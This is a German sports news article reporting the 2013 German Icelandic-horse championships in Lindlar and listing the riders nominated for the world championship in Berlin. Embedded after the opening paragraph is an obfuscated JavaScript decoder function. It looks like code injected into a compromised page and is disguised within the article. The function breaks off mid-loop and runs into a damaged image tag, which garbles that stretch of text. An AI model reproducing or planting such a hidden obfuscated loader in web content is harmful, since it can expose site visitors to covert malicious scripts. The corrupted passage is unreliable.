Islandpferde-Meisterschaft 2013: Team Deutschland ist nominiert!

17. Juli 2013 | Von Redaktion | Kategorie: Gangpferdereitsport, Turniere

[Lindlar (GER)/C. Spaete]. Am vergangenen Wochenende fanden auf dem Gestüt Töltmyllan der Familie Engel in Lindlar die 51. Deutschen Islandpferde-Meisterschaften statt. Die besten deutschen Sportreiter traten in diesem letzten Qualifikationsturnier vor der vom 4. bis 11. August in Berlin stattfindenden Islandpferde-Weltmeisterschaft an, um den Titel des Deutschen Meisters zu erkämpfen und in die WM-Equipe aufgenommen zu werden.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfandpferde-WM_Frauke-Schenzel" src="http://www.horse-today.de/wp-content/uploads/2013/07/Islandpferde-WM_Frauke-Schenzel-601x400.jpg" alt="Frauke Schenzel konnte sich mit einem Meistertitel im Fünfgang, im Viergang und in der Töltprüfung für die Weltmeisterschaft der Islandpferde in Berlin vom 04. bis 11. August 2013 qualifizieren (Foto: C. Späte)." width="601" height="400" />

In der Königsdisziplin, dem Deutschen Töltpreis, siegte Karly Zingsheim auf Dagur mit einer Gesamtwertung von 8,83. In dieser Prüfung stach auch Steffi Svendsen mit Jarl frá Miðkrika im schnellen Tölt heraus. Die beiden bekamen dreimal die Höchstnote 10.

Karly Zingsheim und Steffi Svendsen haben sich damit ihre Tickets nach Berlin gesichert. Ebenfalls auf der WM werden Frauke Schenzel und Tígull vom Kronshof sein. Frauke Schenzel erritt sich die Meistertitel im Fünfgang, im Viergang und in der Töltprüfung (T2).

In der Passprüfung freute sich Melanie Müller mit Bjarkar frá Þverá Skíðadal über eine Gesamtwertung von 8,63 und den Deutschen Meistertitel. Auch sie wird Deutschland auf der WM vertreten. Ebenso Marie Lange-Fuchs, die mit ihrem Omi från Stav und einer Zeit von 22,62 Sekunden ihren Titel als Deutsche Meisterin im Passrennen über 250 Meter zu verteidigen wusste.

Die Deutschen Meister im Überblick:

• Töltpreis T1: Karly Zingsheim mit Dagur

• Töltprüfung T2: Frauke Schenzel mit Óskadís vom Habichtswald

• Viergang V1: Frauke Schenzel mit Tígull vom Kronshof

• Fünfgang F1: Frauke Schenzel mit Fannar frá Kvistum

• Passprüfung PP1: Melanie Müller mit Bjarkar frá Þverá, Skíðadal

• Passrennen 250m (P1): Marie Lange-Fuchs mit Omi från Stav (22,62 Sekunden)

• Passrennen 150m (P3): Kaspar Holweger mit Ljomi von der Elschenau (14,85 Sekunden)

• Speedpass: Svenja Braun mit Hugo (Stolpi) vom Schloß Neubronn (7,42 Sekunden)

• Steffi Svendsen mit Jarl frá Miðkrika (startet in T1/V1)

• Frauke Schenzel mit Tígull vom Kronshof, dreifache Deutsche Meisterin (startet in T1/V1)

• Karly Zingsheim mit Dagur, Deutscher Meister im Töltpreis T1 (startet in T1/V1

• Uli Reber mit Dröfn frá Litla-Moshvoli (startet in T1)

• Melanie Müller mit Bjarkar frá Þverá, Deutsche Meisterin in der Passprüfung (startet in PP1/P2)

• Marie-Lange Fuchs mit Omi från Stav, Deutsche Meisterin im Passrennen (startet in P1/P2)

• Dörte Mitgau mit Ilmur von Ellenbach (startet in F1, T2, PP1)

Ergänzungs-/Ersatzreiter sind:

• Frejia Puttkammer (ganz rechts) mit Blettur von Ellenbach (für T2/V1)

• Vicky Eggertsson mit Herbert frá Halakoti (für F1)

Aus dem Team Junge Reiter (bis 21 Jahre) werden außerdem nach Berlin gehen:

• Charlotte Passau mit Uni vom Kronshof (T2/V1)

• Elisabeth Katharina Schaaf mit Njörður vom Schluensee (F1, T2 und PP1)

• Christopher Weiß mit Vígur frá Eikarbrekku (V1/T2)

• Marian Hannes Wruck mit Bíbí vom Ostetal (F1)

• Johanna Beuk mit Merkur vom Birkelund (T1/V1)

Trackback URL: http://www.horse-today.de/wp-trackback.php?p=105172

Hier klicken, um einen Kommentar zu schreiben